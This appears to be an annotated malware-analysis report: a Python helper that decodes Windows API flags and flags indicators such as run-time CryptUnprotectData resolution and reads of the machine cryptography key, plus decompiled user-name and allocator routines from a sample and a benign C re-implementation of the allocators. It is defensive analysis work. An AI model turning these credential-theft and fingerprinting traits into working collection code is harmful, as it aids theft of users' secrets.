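HKEY_NAMES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ = 0x20019  # STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_BITS = [(0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"), (0x0004, "KEY_CREATE_SUB_KEY"),
            (0x0008, "KEY_ENUMERATE_SUB_KEYS"), (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
            (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"), (0x20000, "READ_CONTROL")]
MEM_BITS = [(0x1000, "MEM_COMMIT"), (0x2000, "MEM_RESERVE"), (0x4000, "MEM_DECOMMIT"), (0x8000, "MEM_RELEASE")]
PAGE_NAMES = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
              0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

def decode_bits(value: int, table, composites=()) -> str:
    """Name the set bits of a flag word; composites such as KEY_READ are matched before single bits."""
    names = []
    for mask, name in list(composites) + list(table):
        if value & mask == mask:
            names.append(name)
            value &= ~mask
    if value:
        names.append(hex(value))  # bits this table does not know
    return " | ".join(names) or "0"

# (api name, argument index) -> decoder for that argument
DECODERS: Dict[tuple, Callable[[int], str]] = {
    ("RegOpenKeyExW", 0): lambda v: HKEY_NAMES.get(v, hex(v)),
    ("RegOpenKeyExW", 3): lambda v: decode_bits(v, KEY_BITS, [(KEY_READ, "KEY_READ")]),
    ("VirtualAlloc", 2): lambda v: decode_bits(v, MEM_BITS),
    ("VirtualAlloc", 3): lambda v: PAGE_NAMES.get(v, hex(v)),
    ("VirtualFree", 2): lambda v: decode_bits(v, MEM_BITS),
}

def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every '• Api.MODULE(args), ref: addr' line; headings and Strings entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        toks = [t.strip() for t in m.group("args").split(",")] if m.group("args").strip() else []
        args: List[Arg] = [int(t, 16) if HEXWORD.match(t) else t for t in toks]
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub") is not None))
    return calls

def documented_args(call: ApiCall) -> List[Arg]:
    """Drop the trailing stack slots printed past the API's real parameter count."""
    return call.args[:PARAM_COUNT.get(call.api, len(call.args))]

def describe(call: ApiCall) -> Dict[int, str]:
    """Decoded names for the arguments this example knows about, keyed by argument index."""
    return {idx: dec(call.args[idx]) for (api, idx), dec in DECODERS.items()
            if api == call.api and idx < len(call.args) and isinstance(call.args[idx], int)}

def fingerprint_indicators(calls: List[ApiCall]) -> Dict[str, bool]:
    """Indicator rule (my own choice, not the report's): victim-ID collection plus run-time DPAPI."""
    apis = {c.api for c in calls}
    strings = {a.lower() for c in calls for a in c.args if isinstance(a, str)}
    hklm_crypto = any(c.api == "RegOpenKeyExW" and documented_args(c)[:1] == [0x80000002] for c in calls)
    return {
        "dpapi_resolved_at_runtime": {"LoadLibraryA", "GetProcAddress"} <= apis
                                     and {"crypt32.dll", "cryptunprotectdata"} <= strings,
        "machine_crypto_key_read": hklm_crypto and r"software\microsoft\cryptography" in strings,
        "user_name_collected": "GetUserNameW" in apis,
        "admin_membership_checked": "CheckTokenMembership" in apis,
    }
```

Running `parse_api_lines(SAMPLE_LINES)` and printing `documented_args` and `describe` for each call gives the trimmed argument list and the decoded flag names; the `fingerprint_indicators` rule reports all four indicators true for these lines. The decoder table only covers the argument positions that appear in this listing, so extend `DECODERS` and `PARAM_COUNT` when pointing it at other functions in the report.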

                                          C-Code - Quality: 100%
                                          			// Decoded from an entry point 4 bytes before E004065EC (next listing); the first three
                                          			// statements are stray bytes, the real body starts at _t5. Collects the user name for the
                                          			// host fingerprint.
                                          			E004065E8(intOrPtr* __eax) {
                                          				short _v516;                 // 256-wide-char buffer for the user name
                                          				signed int _t4;
                                          				signed int _t5;
                                          				int _t9;
                                          				void* _t11;
                                          				signed int _t14;
                                          				void* _t18;
                                          				DWORD* _t19;
                                          
                                          				_t4 = __eax +  *__eax;       // decompiler artifact of the misaligned entry
                                          				 *_t4 =  *_t4 + _t4;         // (same)
                                          				_t5 = _t4 | 0x5300000a;
                                          				_t19 = _t18 + 0xfffffdfc;    // esp - 0x204: stack space for the buffer
                                          				_t14 = _t5;
                                          				 *_t19 = 0xff;               // pcbBuffer: 255 characters
                                          				_t9 = GetUserNameW( &_v516, _t19); // executed
                                          				if(_t9 == 0) {
                                          					_t11 = E00403BDC(_t14);  // failure path
                                          				} else {
                                          					_t11 = E00403D6C(_t14, 0x100,  &_v516); // copy the name into the result string
                                          				}
                                          				return _t11;
                                          			}











                                          Line addresses: 0x004065e8, 0x004065ea, 0x004065ec, 0x004065f1, 0x004065f7, 0x004065f9, 0x0040660d, 0x00406611, 0x00406627, 0x00406613, 0x0040661e, 0x0040661e, 0x00406633

                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                                          • Instruction ID: 5a5990060c673b8f00593b581c9a0ee3644ab744bab1f058c1932740bd518d27
                                          • Opcode Fuzzy Hash: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                                          • Instruction Fuzzy Hash: 1BE0DFB12083424FC3119BA8D880AA53BE49F49300F044876B8D5C72E1FE35CE248753
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Clean decode of the user-name helper: GetUserNameW into a 256-wide-char stack buffer
                                          			// with pcbBuffer = 0xff, then the name is copied into the result string (success) or the
                                          			// E00403BDC fallback runs (failure). Same result string helper as the registry reader.
                                          			E004065EC(signed int __eax) {
                                          				short _v516;                 // 256-wide-char buffer for the user name
                                          				signed int _t4;
                                          				int _t8;
                                          				void* _t10;
                                          				signed int _t13;
                                          				void* _t17;
                                          				DWORD* _t18;
                                          
                                          				_t4 = __eax | 0x5300000a;
                                          				_t18 = _t17 + 0xfffffdfc;    // esp - 0x204: stack space for the buffer
                                          				_t13 = _t4;
                                          				 *_t18 = 0xff;               // pcbBuffer: 255 characters
                                          				_t8 = GetUserNameW( &_v516, _t18); // executed
                                          				if(_t8 == 0) {
                                          					_t10 = E00403BDC(_t13);  // failure path
                                          				} else {
                                          					_t10 = E00403D6C(_t13, 0x100,  &_v516); // copy the name into the result string
                                          				}
                                          				return _t10;
                                          			}










                                          Line addresses: 0x004065ec, 0x004065f1, 0x004065f7, 0x004065f9, 0x0040660d, 0x00406611, 0x00406627, 0x00406613, 0x0040661e, 0x0040661e, 0x00406633

                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                                          • Instruction ID: 7803372b71e91cd4900786e151d6695f3fca8b78fda9d7e8201226f5ab6c0eae
                                          • Opcode Fuzzy Hash: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                                          • Instruction Fuzzy Hash: D7E08CB16043065BD3109AA8D880AAA76E89B88300F00493AB89AD73D0FE39CE248647
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Wide-to-ANSI conversion wrapper using the code page stored in the global at 0x41c5a8
                                          			// (3 = CP_THREAD_ACP, the calling thread's ANSI code page). Parameter mapping:
                                          			// (CodePage, dwFlags=0, src=__ecx, srcChars=_a4, dst=__eax, dstBytes=__edx, NULL, NULL).
                                          			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
                                          				int _t4;
                                          				int _t5;
                                          
                                          				_t4 =  *0x41c5a8; // 0x3 = CP_THREAD_ACP
                                          				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
                                          				return _t5;       // bytes written, or 0 on failure
                                          			}

                                          Instruction addresses: 0x00403614, 0x0040361a, 0x00403620

                                          APIs
                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 626452242-0
                                          • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                          • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
                                          • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                          • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Commit-on-demand helper: rounds the span [__eax, __eax + __edx) out to page
                                          			// boundaries, stores the aligned base and length into the two-dword struct at __ecx,
                                          			// then walks the circular region list headed at 0x41c5d4 and commits
                                          			// (VirtualAlloc MEM_COMMIT, PAGE_READWRITE) the part of the span that overlaps each
                                          			// node's [base, base + size) (dwords at +8 and +0xc). If a commit fails the struct's
                                          			// base is zeroed and the routine returns early. This is runtime heap-manager
                                          			// bookkeeping, not sample-specific logic.
                                          			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
                                          				signed int _v20;
                                          				void** _v24;
                                          				void* _t15;
                                          				void** _t16;
                                          				void* _t17;
                                          				signed int _t27;
                                          				intOrPtr* _t29;
                                          				void* _t31;
                                          				intOrPtr* _t32;
                                          
                                          				_v24 = __ecx;
                                          				 *_t32 = __edx; // requested length
                                          				_t31 = __eax & 0xfffff000; // page-align the start down
                                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000; // page-align the end up (+ binds before &)
                                          				 *_v24 = _t31; // out: aligned base
                                          				_t15 = _v20 - _t31;
                                          				_v24[1] = _t15; // out: aligned length
                                          				_t29 =  *0x41c5d4; // 0x185a384 (first region node; the list head is its own sentinel)
                                          				while(_t29 != 0x41c5d4) {
                                          					_t17 =  *(_t29 + 8); // region base
                                          					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17; // region end
                                          					if(_t31 > _t17) {
                                          						_t17 = _t31; // clamp to the requested span
                                          					}
                                          					if(_t27 > _v20) {
                                          						_t27 = _v20;
                                          					}
                                          					if(_t27 > _t17) {
                                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed: MEM_COMMIT, PAGE_READWRITE on the overlap
                                          						if(_t15 == 0) {
                                          							_t16 = _v24;
                                          							 *_t16 = 0; // signal failure through the out-struct base
                                          							return _t16;
                                          						}
                                          					}
                                          					_t29 =  *_t29; // next node
                                          				}
                                          				return _t15;
                                          			}

                                          Instruction addresses: 0x00401523, 0x00401527, 0x0040152e, 0x00401543, 0x0040154b, 0x00401551, 0x00401557, 0x0040155a, 0x0040159e, 0x00401562, 0x00401568, 0x0040156c, 0x0040156e, 0x0040156e, 0x00401574, 0x00401576, 0x00401576, 0x0040157c, 0x00401589, 0x00401590, 0x00401592, 0x00401598, 0x00000000, 0x00401598, 0x00401590, 0x0040159c, 0x0040159c, 0x004015ad

                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401589
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                          • Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
                                          • Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                          • Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89
                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Fixed-size node pool: pops a 16-byte node from the free list at 0x41c5d0.
                                          			// When the free list is empty it LocalAlloc()s a 0x644-byte chunk
                                          			// (4-byte chunk link + 100 x 16-byte nodes), links the chunk into the chunk
                                          			// list at 0x41c5cc, pushes all 100 nodes onto the free list and only then
                                          			// pops one. Returns 0 only when LocalAlloc fails.
                                          			E004011E4() {
                                          				intOrPtr* _t4;
                                          				void* _t5;
                                          				void _t6;
                                          				intOrPtr* _t9;
                                          				void* _t12;
                                          				void* _t14;
                                          
                                          				if( *0x41c5d0 != 0) {
                                          					L5:
                                          					_t4 =  *0x41c5d0; // pop the head node of the free list
                                          					 *0x41c5d0 =  *_t4;
                                          					return _t4;
                                          				} else {
                                          					_t5 = LocalAlloc(0, 0x644); // executed: 4 + 100 * 16 bytes
                                          					_t12 = _t5;
                                          					if(_t12 != 0) {
                                          						_t6 =  *0x41c5cc; // 0x1859d50 (current chunk list head)
                                          						 *_t12 = _t6; // chunk link at offset 0
                                          						 *0x41c5cc = _t12;
                                          						_t14 = 0;
                                          						do {
                                          							_t2 = (_t14 + _t14) * 8; // 0x4 (node index * 16)
                                          							_t9 = _t12 + _t2 + 4; // skip the chunk link
                                          							 *_t9 =  *0x41c5d0; // push node onto the free list
                                          							 *0x41c5d0 = _t9;
                                          							_t14 = _t14 + 1;
                                          						} while (_t14 != 0x64); // 100 nodes per chunk
                                          						goto L5;
                                          					} else {
                                          						return 0;
                                          					}
                                          				}
                                          			}

                                          Instruction addresses: 0x004011ee, 0x0040122a, 0x0040122a, 0x0040122e, 0x00401232, 0x004011f0, 0x004011f7, 0x004011fc, 0x00401200, 0x00401207, 0x0040120c, 0x0040120e, 0x00401214, 0x00401216, 0x0040121a, 0x0040121a, 0x00401220, 0x00401222, 0x00401224, 0x00401225, 0x00000000, 0x00401202, 0x00401206, 0x00401206, 0x00401200

                                          APIs
                                          • LocalAlloc.KERNEL32(00000000,00000644,?,0041C5D4,00401247,?,?,00401447,?,00100000,00002000,00000004,0041C5E4,?,?), ref: 004011F7
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocLocal
                                          • String ID:
                                          • API String ID: 3494564517-0
                                          • Opcode ID: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
                                          • Instruction ID: 1b97f869ca2ef78b7edf313f24570502d3759f43221a4d236e640dffafdc993f
                                          • Opcode Fuzzy Hash: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
                                          • Instruction Fuzzy Hash: 5FF05E727402119FD714CF69D8806A577E6EBAD315F20847ED185E77A0E635AC418B48
                                          Uniqueness Score: -1.00%

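The two allocator routines above (E0040151C and E004011E4) are the kind of runtime-library code an analyst should recognise quickly and skip. The following C re-implementation is an added illustration, not code from the analysed sample or from the sandbox: page_span() reproduces the page rounding of E0040151C, and node_alloc() reproduces the chunked free-list pool of E004011E4 with LocalAlloc replaced by malloc and the globals at 0x41c5cc / 0x41c5d0 turned into statics. node_free() is an assumed counterpart that does not appear in the dump; the chunk size differs from 0x644 on a 64-bit build because the link pointer is wider.

```c
/* Added example: reference shapes of the two decompiled allocator helpers.
 * Not the sample's code; the VirtualAlloc commit loop of E0040151C is
 * reduced to its address arithmetic so the block runs on any host. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

#define PAGE_MASK       0xfffff000u
#define NODE_SIZE       16u   /* (i + i) * 8 in the decompiled loop */
#define NODES_PER_CHUNK 100u  /* loop runs while i != 0x64 */

/* E0040151C: page-align [addr, addr + size) outward.  The sample then
 * VirtualAlloc(MEM_COMMIT, PAGE_READWRITE)s the overlap of this span with
 * every node of its reserved-region list. */
void page_span(uint32_t addr, uint32_t size, uint32_t *base, uint32_t *len)
{
    uint32_t lo = addr & PAGE_MASK;                  /* eax & 0xfffff000 */
    uint32_t hi = (addr + size + 0xfffu) & PAGE_MASK; /* (eax + edx + 0xfff) & 0xfffff000 */
    *base = lo;
    *len  = hi - lo;
}

/* One 16-byte pool node: the first word doubles as the free-list link,
 * exactly as in the sample (node->next = *0x41c5d0). */
struct node {
    struct node *next;
    uint8_t      pad[NODE_SIZE - sizeof(struct node *)];
};

/* One LocalAlloc'd chunk: link to the previous chunk, then 100 nodes.
 * On 32-bit this is 4 + 100 * 16 = 0x644 bytes, the constant in the dump. */
struct chunk {
    struct chunk *next;
    struct node   nodes[NODES_PER_CHUNK];
};

static struct chunk *chunk_list = NULL; /* stands in for the global at 0x41c5cc */
static struct node  *free_list  = NULL; /* stands in for the global at 0x41c5d0 */

/* E004011E4: pop a node; if the free list is empty, allocate a chunk, link it
 * into chunk_list and push all of its nodes first.  NULL only if malloc fails. */
void *node_alloc(void)
{
    if (free_list == NULL) {
        struct chunk *c = malloc(sizeof *c);   /* LocalAlloc(0, 0x644) */
        if (c == NULL)
            return NULL;
        c->next    = chunk_list;               /* *chunk = old head      */
        chunk_list = c;                        /* head  = chunk          */
        for (unsigned i = 0; i < NODES_PER_CHUNK; i++) {
            c->nodes[i].next = free_list;      /* push node i            */
            free_list        = &c->nodes[i];
        }
    }
    struct node *n = free_list;                /* pop head (label L5)    */
    free_list = n->next;
    return n;
}

/* Assumed counterpart, not present in the dump: return a node to the pool. */
void node_free(void *p)
{
    struct node *n = p;
    n->next   = free_list;
    free_list = n;
}

/* Helpers for checking pool state. */
size_t node_free_count(void)
{
    size_t k = 0;
    for (struct node *n = free_list; n != NULL; n = n->next)
        k++;
    return k;
}

size_t chunk_count(void)
{
    size_t k = 0;
    for (struct chunk *c = chunk_list; c != NULL; c = c->next)
        k++;
    return k;
}
```

Because the sample pushes nodes in ascending order, the first node handed out is the last one in the chunk and successive allocations walk downwards in 16-byte steps; seeing that pattern in a debugger is a quick confirmation that a pointer came from this pool rather than from the process heap.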
                                          Non-executed Functions

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938398172.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000007.00000002.938349497.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.939279059.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.939520195.0000000000E6E000.00000008.00020000.sdmp
                                          • Associated: 00000007.00000002.939540872.0000000000E72000.00000008.00020000.sdmp
                                          • Associated: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: __wcsnicmp$_malloc
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 2350238924-86951937
                                          • Opcode ID: f9db2205f0c1bcea7dd261f1461110fd1868a14340a5fa3828855b07ee80c407
                                          • Instruction ID: 1f603dd871c51acd56765b4576f1c972f49638126f3903ceb9b611691d39ea80
                                          • Opcode Fuzzy Hash: f9db2205f0c1bcea7dd261f1461110fd1868a14340a5fa3828855b07ee80c407
                                          • Instruction Fuzzy Hash: A98104B0640305FACF20BB65EC42FFE7768EF05700F084029F946AA296EB65DA55D6B1
                                          Uniqueness Score: -1.00%